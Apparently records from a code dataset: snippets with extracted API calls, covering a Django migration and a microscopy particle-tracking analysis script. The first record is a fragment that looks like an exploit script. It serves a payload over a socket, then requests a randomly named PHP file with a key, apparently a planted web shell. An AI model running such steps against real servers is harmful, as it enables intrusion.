s.listen()
cl, cl_info = s.accept()
print("Got connection from %s, sending files" % (cl_info, ))
cl.sendall(ANS)
print(from_client.readline().strip())
print(from_client.readline().strip())
print(from_client.readline().strip())
print(requests.get("http://%s/JhXY.php?key=KnfSM" % HOST).text)
|
[
"socket.socket",
"requests.get"
] |
[((950, 965), 'socket.socket', 'socket.socket', ([], {}), '()\n', (963, 965), False, 'import socket\n'), ((1374, 1389), 'socket.socket', 'socket.socket', ([], {}), '()\n', (1387, 1389), False, 'import socket\n'), ((1715, 1766), 'requests.get', 'requests.get', (["('http://%s/JhXY.php?key=KnfSM' % HOST)"], {}), "('http://%s/JhXY.php?key=KnfSM' % HOST)\n", (1727, 1766), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-07 22:29
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('contentcuration', '0039_auto_20161101_1555'),
]
operations = [
migrations.AddField(
model_name='file',
name='assessment_item',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='files', to='contentcuration.AssessmentItem'),
),
]
|
[
"django.db.models.ForeignKey"
] |
[((467, 621), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""files"""', 'to': '"""contentcuration.AssessmentItem"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='files', to='contentcuration.AssessmentItem'\n )\n", (484, 621), False, 'from django.db import models\n')]
|
# test bin, analyze, and plot functions
# imports
import os
from os.path import join
from os import listdir
import matplotlib.pyplot as plt
# imports
import numpy as np
import pandas as pd
from scipy.optimize import curve_fit
import filter
import analyze
from correction import correct
from utils import fit, functions, bin, io, plotting, modify, plot_collections
from utils.plotting import lighten_color
# A note on SciencePlots colors
"""
Blue: #0C5DA5
Green: #00B945
Red: #FF9500
Orange: #FF2C00
Other Colors:
Light Blue: #7BC8F6
Paler Blue: #0343DF
Azure: #069AF3
Dark Green: #054907
"""
sciblue = '#0C5DA5'
scigreen = '#00B945'
scired = '#FF9500'
sciorange = '#FF2C00'
plt.style.use(['science', 'ieee', 'std-colors'])
fig, ax = plt.subplots()
size_x_inches, size_y_inches = fig.get_size_inches()
plt.close(fig)
# ----------------------------------------------------------------------------------------------------------------------
# 1. SETUP - BASE DIRECTORY
base_dir = '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/'
# ----------------------------------------------------------------------------------------------------------------------
# 2. SETUP - IDPT
path_idpt = join(base_dir, 'results-04.26.22_idpt')
path_test_coords = join(path_idpt, 'coords/test-coords')
path_calib_coords = join(path_idpt, 'coords/calib-coords')
path_similarity = join(path_idpt, 'similarity')
path_results = join(path_idpt, 'results')
path_figs = join(path_idpt, 'figs')
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
# 3. ANALYSIS - READ FILES
method = 'idpt'
microns_per_pixel = 0.8
# ----- 4.1 CORRECT TEST COORDS
correct_test_coords = False
if correct_test_coords:
use_idpt_zf = False
use_spct_zf = False
# ------------------------------------------------------------------------------------------------------------------
if use_idpt_zf:
"""
NOTE: This correction scheme fits a 2D spline to the in-focus particle positions and uses this to set their
z_f = 0 position.
"""
param_zf = 'zf_from_peak_int'
plot_calib_plane = False
plot_calib_spline = False
kx, ky = 2, 2
# step 1. read calibration coords
dfc, dfcpid, dfcpop, dfcstats = io.read_calib_coords(path_calib_coords, method)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std) & (dfcpid[param_zf] < zf_c_mean + zf_c_std)]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_calib_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/idpt-calib-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/idpt-calib-coords_fit-plane_raw.xlsx')
# step 4. FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
if plot_calib_spline:
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/idpt-calib-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# step 5. read test_coords
dft = io.read_test_coords(path_test_coords)
# step 6. drop unnecessary columns in dft
dft = dft[['frame', 'id', 'z', 'z_true', 'x', 'y', 'cm', 'error']]
# step 7. create a z_corr column by using fitted spline to correct z
dft = correct.correct_z_by_spline(dft, bispl=bispl_c, param_z='z')
dft['z_true_corr'] = dft['z_true'] - dft['z_cal_surf']
# step 8. export corrected test_coords
dft.to_excel(path_results + '/test_coords_corrected_t-calib2_c-calib1.xlsx', index=False)
elif use_spct_zf:
"""
NOTE: No correction is currently performed. The z-coords are well aligned enough in both calibration image sets
to just ignore. This is not necessarily surprising because the calibration images were acquired with the intention
of making the z-coords identical for all calibration image sets (by using the same beginning and ending tick mark
on the fine adjustment knob during image acquisition).
"""
# --------------------------------------------------------------------------------------------------------------
# SETUP - SPCT CALIBRATION IN-FOCUS COORDS
# SPCT analysis of images used for IDPT calibration
path_spct_calib_coords = join(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords')
path_calib_pid_defocus = join(path_spct_calib_coords, 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx')
path_calib_spct_stats = join(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx')
path_calib_spct_pop = join(path_spct_calib_coords, 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx')
# SPCT analysis of images used for IDPT test
path_spct_test_coords = join(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords')
path_test_pid_defocus = join(path_spct_test_coords, 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx')
path_test_spct_stats = join(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx')
path_test_spct_pop = join(path_spct_test_coords, 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx')
# --------------------------------------------------------------------------------------------------------------
# --- PART A. READ COORDS USED FOR IDPT CALIBRATION (i.e. 'calib1')
merge_spct_stats = True
param_zf = 'zf_from_peak_int'
plot_calib_plane = True
plot_test_plane = True
kx, ky = 2, 2
# step 1. merge [['x', 'y']] into spct pid defocus stats.
if merge_spct_stats:
# read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats
dfcpid = pd.read_excel(path_calib_pid_defocus)
dfcstats = pd.read_excel(path_calib_spct_stats)
dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats,
dfcpid])
else:
# read SPCT pid defocus stats that have already been merged
path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx')
dfcpid = pd.read_excel(path_calib_pid_defocus)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > 34) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)]
dfcpid = dfcpid[dfcpid['x'] > 120]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_calib_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/calibration-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/calibration-coords_fit-plane_raw.xlsx')
# FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/calibration-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# ---
# --- PART B. READ COORDS USED FOR IDPT TEST (i.e. 'calib2')
# step 1. merge [['x', 'y']] into spct pid defocus stats.
if merge_spct_stats:
# read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats
dfcpid = pd.read_excel(path_test_pid_defocus)
dfcstats = pd.read_excel(path_test_spct_stats)
dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats,
dfcpid])
else:
# read SPCT pid defocus stats that have already been merged
path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx')
dfcpid = pd.read_excel(path_calib_pid_defocus)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std / 2) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_test_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/test-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/test-coords_fit-plane_raw.xlsx')
# FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/test-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 4. PLOT TEST COORDS RMSE-Z
analyze_test_coords = False
save_plots = False
show_plots = False
if analyze_test_coords:
# read test coords
dft = io.read_test_coords(path_test_coords)
# test coords stats
mag_eff = 20.0
area_pixels = 512 ** 2
area_microns = (512 * microns_per_pixel) ** 2
i_num_rows = len(dft)
i_num_pids = len(dft.id.unique())
# ---
# --- STEP 0. drop and rename columns for simplicity
dft = dft.drop(columns=['z', 'z_true'])
dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'})
# ---
rmse_all_particles = False
rmse_on_off_bpe = False
rmse_compare = False
# format plots
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
lbls = ['On', 'Border', 'Off']
markers = ['s', 'd', 'o']
if rmse_all_particles:
# --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES
column_to_bin = 'z_true'
bins_z = 20
round_z_to_decimal = 3
min_cm = 0.5
# 1.1 mean rmse-z
dfrmse_mean = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=1,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse_mean.to_excel(path_results + '/mean-rmse-z_bin=1_no-filters.xlsx')
# 1.2 binned rmse-z
dfrmse = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=bins_z,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse.to_excel(path_results + '/binned-rmse-z_bins={}_no-filters.xlsx'.format(bins_z))
# 1.3 groupby 'bin' rmse-z mean + std
dfrmsem, dfrmsestd = bin.bin_generic(dft,
column_to_bin='bin',
column_to_count='id',
bins=bins_z,
round_to_decimal=round_z_to_decimal,
return_groupby=True)
# 1.3 plot binned rmse-z
if save_plots or show_plots:
# close all figs
plt.close('all')
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(dfrmse.index, dfrmse.rmse_z, '-o')
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/rmse-z_microns.png')
if show_plots:
plt.show()
plt.close()
# ----------------------- Z-MEAN +/- Z-STD PLOTS
# fit line
popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z)
z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max())
rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z)**2) / len(dfrmse.z))
print(rmse_fit_line)
# binned calibration curve with std-z errorbars (microns) + fit line
fig, ax = plt.subplots()
ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue,
label=r'$\overline{z} \pm \sigma$') #
ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25,
label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3)))
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs +
'/calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format(
np.round(popt[0],
3),
np.round(popt[1],
3))
)
if show_plots:
plt.show()
plt.close()
if rmse_on_off_bpe:
# --- STEP 0. SPLIT DATAFRAME INTO (1) OFF BPE and (2) OFF BPE.
column_to_bin = 'x'
bins_x = [145, 175, 205]
round_x_to_decimal = 0
dfbx = bin.bin_by_list(dft,
column_to_bin=column_to_bin,
bins=bins_x,
round_to_decimal=round_x_to_decimal,
)
df_on = dfbx[dfbx['bin'] == bins_x[0]]
df_edge = dfbx[dfbx['bin'] == bins_x[1]]
df_off = dfbx[dfbx['bin'] == bins_x[2]]
# --- plotting
# --- STEP 1. PLOT CALIBRATION CURVE (Z VS. Z_TRUE) FOR EACH DATAFRAME (ON, EDGE, OFF)
ss = 1
fig, ax = plt.subplots()
ax.scatter(df_off.z_true, df_off.z, s=ss, marker=markers[2], color=sciblue, label=lbls[2])
ax.scatter(df_on.z_true, df_on.z, s=ss, marker=markers[0], color=sciorange, label=lbls[0])
ax.scatter(df_edge.z_true, df_edge.z, s=ss, marker=markers[1], color=scired, label=lbls[1])
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', markerscale=2.5)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/on-edge-off-bpe_calibration_curve.png')
if show_plots:
plt.show()
plt.close()
# --- STEP 2. FOR EACH DATAFRAME (ON, EDGE, OFF), COMPUTE RMSE-Z AND PLOT
for lbl, dft in zip(lbls, [df_on, df_edge, df_off]):
# --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES
column_to_bin = 'z_true'
bins_z = 20
round_z_to_decimal = 3
min_cm = 0.5
# 1.1 mean rmse-z
dfrmse_mean = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=1,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse_mean.to_excel(path_results + '/{}_mean-rmse-z_bin=1_no-filters.xlsx'.format(lbl))
# 1.2 binned rmse-z
dfrmse = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=bins_z,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse.to_excel(path_results + '/{}_binned-rmse-z_bins={}_no-filters.xlsx'.format(lbl, bins_z))
# 1.3 groupby 'bin' rmse-z mean + std
dfrmsem, dfrmsestd = bin.bin_generic(dft,
column_to_bin='bin',
column_to_count='id',
bins=bins_z,
round_to_decimal=round_z_to_decimal,
return_groupby=True)
# 1.3 plot binned rmse-z
if save_plots or show_plots:
# close all figs
plt.close('all')
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(dfrmse.index, dfrmse.rmse_z, '-o')
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/{}_rmse-z_microns.png'.format(lbl))
if show_plots:
plt.show()
plt.close()
# ----------------------- Z-MEAN +/- Z-STD PLOTS
# fit line
popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z)
z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max())
rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z) ** 2) / len(dfrmse.z))
print(rmse_fit_line)
# binned calibration curve with std-z errorbars (microns) + fit line
fig, ax = plt.subplots()
ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1,
color=sciblue,
label=r'$\overline{z} \pm \sigma$') #
ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25,
label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3)))
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs +
'/{}_calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format(
lbl,
np.round(popt[0],
3),
np.round(popt[1],
3))
)
if show_plots:
plt.show()
plt.close()
if rmse_compare:
# 1. read binned rmse-z dataframes from Excel
path_rmse_compare = join(path_results, 'on-edge-off-bpe')
df1 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[0])))
df2 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[1])))
df3 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[2])))
# 1.3 plot binned rmse-z
if save_plots or show_plots:
ms = 4
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(df3.bin, df3.rmse_z, '-o', ms=ms, label=lbls[2], color=sciblue)
ax.plot(df2.bin, df2.rmse_z, '-o', ms=ms, label=lbls[1], color=scired)
ax.plot(df1.bin, df1.rmse_z, '-o', ms=ms, label=lbls[0], color=sciorange)
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')
if show_plots:
plt.show()
plt.close()
# rmse-z (microns) + c_m
darken_clr = 1.0
alpha_clr = 1.0
fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})
axr.plot(df3.bin, df3.cm, '-', ms=ms-2, marker=markers[2], color=sciblue)
axr.plot(df2.bin, df2.cm, '-', ms=ms-2, marker=markers[1], color=scired)
axr.plot(df1.bin, df1.cm, '-', ms=ms-2, marker=markers[0], color=sciorange)
axr.set_ylabel(r'$c_{m}$')
ax.plot(df3.bin, df3.rmse_z, '-', ms=ms-0.75, marker=markers[2], color=sciblue, label=lbls[2])
ax.plot(df2.bin, df2.rmse_z, '-', ms=ms-0.75, marker=markers[1], color=scired, label=lbls[1])
ax.plot(df1.bin, df1.rmse_z, '-', ms=ms-0.75, marker=markers[0], color=sciorange, label=lbls[0])
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')
if show_plots:
plt.show()
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 5. IDPT VS. SPCT - COMPARE NUMBER OF PARTICLES PER Z
compare_idpt_spct = False
save_plots = False
show_plots = False
if compare_idpt_spct:
# --- 1. IDPT
# read IDPT test coords
dft = io.read_test_coords(path_test_coords)
# test coords stats
mag_eff = 20.0
area_pixels = 512 ** 2
area_microns = (512 * microns_per_pixel) ** 2
i_num_rows = len(dft)
i_num_pids = len(dft.id.unique())
dft = dft.drop(columns=['z', 'z_true'])
dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'})
# --- 2. SPCT
# 2.1 read SPCT off-bpe test coords
dfs_off = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx')
dfs_on = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx')
# 2.2 correct z by mean z_f from peak_intensity
z_f_mean = 35.1
dfs_off['z'] = dfs_off['z'] - z_f_mean
dfs_off['z_true'] = dfs_off['z_true'] - z_f_mean
dfs_on['z'] = dfs_on['z'] - z_f_mean
dfs_on['z_true'] = dfs_on['z_true'] - z_f_mean
# --- 3. GROUPBY Z_TRUE
dftg = dft.copy()
dftg = dftg.round({'z_true': 0})
dftc = dftg.groupby('z_true').count().reset_index()
dfs_offc = dfs_off.groupby('z_true').count().reset_index()
dfs_onc = dfs_on.groupby('z_true').count().reset_index()
# filter z_true for pretty plotting
zlim = 35
dftc = dftc[(dftc['z_true'] > -zlim) & (dftc['z_true'] < zlim)]
dfs_offc = dfs_offc[(dfs_offc['z_true'] > -zlim) & (dfs_offc['z_true'] < zlim)]
dfs_onc = dfs_onc[(dfs_onc['z_true'] > -zlim) & (dfs_onc['z_true'] < zlim)]
# ---
# --- plotting
# format plots
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
ms = 3
# FIGURE 1. PLOT NUMBER OF PARTICLES PER Z_TRUE
fig, ax = plt.subplots()
ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$')
ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$')
ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$')
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$N_{p} \: (\#)$')
ax.set_ylim([0, 200])
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-idpt-spct_num-particles.png')
if show_plots:
plt.show()
plt.close()
# ---
# FIGURE 2. PLOT NUMBER OF PARTICLES PER Z_TRUE AND CM
dftm = dftg.groupby('z_true').mean().reset_index()
dfs_offm = dfs_off.groupby('z_true').mean().reset_index()
dfs_onm = dfs_on.groupby('z_true').mean().reset_index()
# filter z_true for pretty plotting
dftm = dftm[(dftm['z_true'] > -zlim) & (dftm['z_true'] < zlim)]
dfs_offm = dfs_offm[(dfs_offm['z_true'] > -zlim) & (dfs_offm['z_true'] < zlim)]
dfs_onm = dfs_onm[(dfs_onm['z_true'] > -zlim) & (dfs_onm['z_true'] < zlim)]
# plot
fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})
axr.plot(dftm.z_true, dftm.cm, '-o', ms=ms - 1, color=sciblue)
axr.plot(dfs_offm.z_true, dfs_offm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.0))
axr.plot(dfs_onm.z_true, dfs_onm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.2))
axr.set_ylabel(r'$c_{m}$')
axr.set_ylim([0.790, 1.01])
axr.set_yticks([0.8, 0.9, 1.0])
ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$')
ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$')
ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$')
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$N_{p} \: (\#)$')
ax.set_ylim([0, 185])
ax.set_yticks([0, 50, 100, 150])
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')
if show_plots:
plt.show()
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 6. AVERAGE PARTICLE-TO-PARTICLE SIMILARITY PER-FRAME
plot_average_particle_similarity = False
if plot_average_particle_similarity:
# setup
save_plots = True
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
ms = 3
# read dataframe
fp = join(base_dir, 'average-particle-similarity/'
'average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx')
dfsim = pd.read_excel(fp)
# plot
fig, ax = plt.subplots()
ax.plot(dfsim.z_corr, dfsim.sim, '-o', ms=ms)
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$S (p_{i}, p_{N})$')
ax.set_ylim([0.49, 1.01])
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/average-particle-to-particle-similarity.png')
plt.show()
plt.close()
j = 1
print("Analysis completed without errors.")
|
[
"utils.plotting.lighten_color",
"utils.functions.line",
"utils.io.read_calib_coords",
"utils.plotting.scatter_3d_and_spline",
"matplotlib.pyplot.style.use",
"matplotlib.pyplot.tight_layout",
"os.path.join",
"numpy.round",
"utils.bin.bin_by_list",
"matplotlib.pyplot.close",
"utils.plotting.plot_fitted_plane_and_points",
"correction.correct.fit_in_focus_plane",
"matplotlib.pyplot.subplots",
"utils.fit.fit_3d_spline",
"matplotlib.pyplot.show",
"pandas.DataFrame.from_dict",
"scipy.optimize.curve_fit",
"pandas.read_excel",
"correction.correct.correct_z_by_spline",
"utils.bin.bin_local_rmse_z",
"utils.bin.bin_generic",
"utils.modify.merge_calib_pid_defocus_and_correction_coords",
"utils.io.read_test_coords",
"matplotlib.pyplot.savefig"
] |
